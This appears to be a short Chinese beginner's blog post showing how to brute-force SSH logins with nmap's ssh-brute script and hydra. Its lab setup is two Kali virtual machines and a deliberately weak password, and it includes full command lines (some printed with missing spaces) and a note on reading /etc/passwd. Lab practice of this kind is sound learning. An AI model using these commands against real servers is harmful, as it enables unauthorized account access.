SSH 爲 Secure Shell 的縮寫,由 IETF 的網絡小組(Network Working Group)所制定;SSH 爲建立在應用層基礎上的安全協議。SSH 是目前較可靠,專爲遠程登錄會話和其他網絡服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題。SSH最初是UNIX系統上的一個程序,後來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網絡中的漏洞。SSH客戶端適用於多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平臺,都可運行SSH。
簡單來說,在很多運維場景,都會使用ssh遠程操作linux服務器。雖然它相對於telnet已經安全很多,但是也架不住最原始最直接的暴力破解法。以下是小白剛剛學到的兩種辦法:
1、使用nmap爆破:
命令如下:
nmap -p 22 --script=ssh-brute --script-args userdb=用戶字典,passdb=密碼字典 目標機ip
例如:
nmap-p22--script=ssh-brute --script-args userdb=2.txt,passdb=1.txt192.168.229.129
就是在構建好用戶字典2.txt和密碼字典1.txt後,嘗試爆破192.168.229.129的ssh登陸口令。
最終爆破得到密碼爲:aaaaaa。
2、使用hydra爆破:
hydra -l root -P ssh_password.txt 目標機ip ssh -v
其中-l 指定用戶名,可以使用-L指定用戶名字典文件;-p指定密碼,-P指定密碼字典文件;-v顯示詳細的執行過程。
例如:
hydra-lezpd-P1.txt192.168.229.129ssh-v
就是在構建好密碼字典1.txt後,嘗試爆破192.168.229.129的用戶ezpd的密碼。
同樣得到密碼:aaaaaa。
簡單比較一下:
1、hydra使用起來更靈活。在已知用戶名的情況下,使用hydra會更方便一些。
2、兩個工具都不止於爆破ssh密碼,nmap還能掃描網絡,hydra還能爆破錶單等。
囉嗦一句我的測試環境:用vmware 15 創建的兩個kali虛擬機,一個ip爲192.168.229.128,一個ip爲192.168.229.129。在129這臺創建一個用戶ezpd,密碼爲:aaaaaa。然後啓動ssh服務。
再囉嗦一句:
創建用戶的命令爲:
adduser用戶名
這條命令是引導式的,接下來按照提示輸入密碼,一頓回車就行。
還囉嗦一句:
啓動ssh服務的命令爲:
servicesshd start
最後囉嗦一句:
可以通過passwd文件,查看linux有哪些用戶。命令爲:
cat/etc/passwd
更多內容,歡迎到我的微信公衆號:互聯網小白,交流討論!